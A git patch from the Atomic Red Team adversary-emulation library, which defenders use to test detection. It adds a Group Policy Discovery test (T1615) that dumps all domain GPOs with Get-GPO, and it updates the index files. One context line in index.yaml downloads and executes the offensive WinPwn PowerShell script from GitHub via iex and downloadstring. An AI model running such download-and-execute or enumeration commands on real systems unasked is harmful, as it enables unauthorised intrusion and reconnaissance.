From 2007ac5d8d4798121a9465d9d97523dfbe117b08 Mon Sep 17 00:00:00 2001
From: Atomic Red Team doc generator <opensource@redcanary.com>
Date: Tue, 17 May 2022 22:25:12 +0000
Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip]

---
 atomics/Indexes/Indexes-CSV/index.csv         |  1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv |  1 +
 atomics/Indexes/Indexes-Markdown/index.md     |  1 +
 .../Indexes/Indexes-Markdown/windows-index.md |  1 +
 atomics/Indexes/index.yaml                    | 35 +++++++++++
 atomics/T1615/T1615.md                        | 61 +++++++++++++++++++
 6 files changed, 100 insertions(+)

diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index f2503b01..6514bf9a 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -935,6 +935,7 @@ discovery,T1615,Group Policy Discovery,1,Display group policy information via gp
 discovery,T1615,Group Policy Discovery,2,Get-DomainGPO to display group policy information via PowerView,4e524c4e-0e02-49aa-8df5-93f3f7959b9f,powershell
 discovery,T1615,Group Policy Discovery,3,WinPwn - GPOAudit,bc25c04b-841e-4965-855f-d1f645d7ab73,powershell
 discovery,T1615,Group Policy Discovery,4,WinPwn - GPORemoteAccessPolicy,7230d01a-0a72-4bd5-9d7f-c6d472bc6a59,powershell
+discovery,T1615,Group Policy Discovery,5,MSFT Get-GPO Cmdlet,52778a8f-a10b-41a4-9eae-52ddb74072bf,powershell
 discovery,T1087.001,Local Account,1,Enumerate all accounts (Local),f8aab3dd-5990-4bf8-b8ab-2226c951696f,sh
 discovery,T1087.001,Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
 discovery,T1087.001,Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 307e3d7a..41394156 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -668,6 +668,7 @@ discovery,T1615,Group Policy Discovery,1,Display group policy information via gp
 discovery,T1615,Group Policy Discovery,2,Get-DomainGPO to display group policy information via PowerView,4e524c4e-0e02-49aa-8df5-93f3f7959b9f,powershell
 discovery,T1615,Group Policy Discovery,3,WinPwn - GPOAudit,bc25c04b-841e-4965-855f-d1f645d7ab73,powershell
 discovery,T1615,Group Policy Discovery,4,WinPwn - GPORemoteAccessPolicy,7230d01a-0a72-4bd5-9d7f-c6d472bc6a59,powershell
+discovery,T1615,Group Policy Discovery,5,MSFT Get-GPO Cmdlet,52778a8f-a10b-41a4-9eae-52ddb74072bf,powershell
 discovery,T1087.001,Local Account,8,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
 discovery,T1087.001,Local Account,9,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
 discovery,T1087.001,Local Account,10,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 3bc982fd..954c4224 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1455,6 +1455,7 @@
   - Atomic Test #2: Get-DomainGPO to display group policy information via PowerView [windows]
   - Atomic Test #3: WinPwn - GPOAudit [windows]
   - Atomic Test #4: WinPwn - GPORemoteAccessPolicy [windows]
+  - Atomic Test #5: MSFT Get-GPO Cmdlet [windows]
 - T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1087.001 Local Account](../../T1087.001/T1087.001.md)
   - Atomic Test #1: Enumerate all accounts (Local) [linux]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 5279ffba..4569f004 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -1065,6 +1065,7 @@
   - Atomic Test #2: Get-DomainGPO to display group policy information via PowerView [windows]
   - Atomic Test #3: WinPwn - GPOAudit [windows]
   - Atomic Test #4: WinPwn - GPORemoteAccessPolicy [windows]
+  - Atomic Test #5: MSFT Get-GPO Cmdlet [windows]
 - T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1087.001 Local Account](../../T1087.001/T1087.001.md)
   - Atomic Test #8: Enumerate all accounts on Windows (Local) [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index e73fe9f2..a8e5bbcc 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -60272,6 +60272,41 @@ discovery:
           iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
           GPORemoteAccessPolicy -consoleoutput -noninteractive
         name: powershell
+    - name: MSFT Get-GPO Cmdlet
+      auto_generated_guid: 52778a8f-a10b-41a4-9eae-52ddb74072bf
+      description: 'The Get-GPO cmdlet gets one Group Policy Object (GPO) or all the
+        GPOs in a domain. Tested on Windows Server 2019 as a domain user with computer
+        joined to domain. Reference: https://docs.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps'
+      supported_platforms:
+      - windows
+      input_arguments:
+        gpo_output:
+          description: The output of the Get-GPO cmdlet
+          type: String
+          default: "$env:temp\\GPO_Output.txt"
+        gpo_param:
+          description: You can specify a GPO by its display name or by its globally
+            unique identifier (GUID) to get a single GPO, or you can get all the GPOs
+            in the domain through the All parameter
+          type: string
+          default: "-All"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Add Rsat.ActiveDirectory.DS
+        prereq_command: if(Get-WindowsCapability -Online -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0
+          | Where-Object { $_.State -eq 'Installed' }){ exit 0 } else { exit 1 }
+        get_prereq_command: Add-WindowsCapability -online -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0
+      - description: 'Add Rsat.GroupPolicy.Management.Tools ###Two RSAT Modules needed
+          for this to work on Win10, WinServer 2019 works by default. This will take
+          a long time (almost 2 minutes) to install RSAT Manually###.'
+        prereq_command: if(Get-WindowsCapability -Online -Name Rsat.GroupPolicy.Management.Tools~~~~0.0.1.0
+          | Where-Object { $_.State -eq 'Installed' }){ exit 0 } else { exit 1 }
+        get_prereq_command: Add-WindowsCapability -online -Name Rsat.GroupPolicy.Management.Tools~~~~0.0.1.0
+      executor:
+        command: 'Get-GPO -Domain $ENV:userdnsdomain #{gpo_param} >> #{gpo_output}'
+        cleanup_command: del $env:temp\GPO_Output.txt -erroraction silentlycontinue
+        name: powershell
+        elevation_required: true
   T1016.001:
     technique:
       object_marking_refs:
diff --git a/atomics/T1615/T1615.md b/atomics/T1615/T1615.md
index 8f02187a..2f479c5d 100644
--- a/atomics/T1615/T1615.md
+++ b/atomics/T1615/T1615.md
@@ -14,6 +14,8 @@ Adversaries may use commands such as <code>gpresult</code> or various publicly a
 
 - [Atomic Test #4 - WinPwn - GPORemoteAccessPolicy](#atomic-test-4---winpwn---gporemoteaccesspolicy)
 
+- [Atomic Test #5 - MSFT Get-GPO Cmdlet](#atomic-test-5---msft-get-gpo-cmdlet)
+
 
 <br/>
 
@@ -134,4 +136,63 @@ GPORemoteAccessPolicy -consoleoutput -noninteractive
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #5 - MSFT Get-GPO Cmdlet
+The Get-GPO cmdlet gets one Group Policy Object (GPO) or all the GPOs in a domain. Tested on Windows Server 2019 as a domain user with computer joined to domain. Reference: https://docs.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 52778a8f-a10b-41a4-9eae-52ddb74072bf
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| gpo_output | The output of the Get-GPO cmdlet | String | $env:temp&#92;GPO_Output.txt|
+| gpo_param | You can specify a GPO by its display name or by its globally unique identifier (GUID) to get a single GPO, or you can get all the GPOs in the domain through the All parameter | string | -All|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Get-GPO -Domain $ENV:userdnsdomain #{gpo_param} >> #{gpo_output}
+```
+
+#### Cleanup Commands:
+```powershell
+del $env:temp\GPO_Output.txt -erroraction silentlycontinue
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Add Rsat.ActiveDirectory.DS
+##### Check Prereq Commands:
+```powershell
+if(Get-WindowsCapability -Online -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0 | Where-Object { $_.State -eq 'Installed' }){ exit 0 } else { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+Add-WindowsCapability -online -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0
+```
+##### Description: Add Rsat.GroupPolicy.Management.Tools ###Two RSAT Modules needed for this to work on Win10, WinServer 2019 works by default. This will take a long time (almost 2 minutes) to install RSAT Manually###.
+##### Check Prereq Commands:
+```powershell
+if(Get-WindowsCapability -Online -Name Rsat.GroupPolicy.Management.Tools~~~~0.0.1.0 | Where-Object { $_.State -eq 'Installed' }){ exit 0 } else { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+Add-WindowsCapability -online -Name Rsat.GroupPolicy.Management.Tools~~~~0.0.1.0
+```
+
+
+
+
 <br/>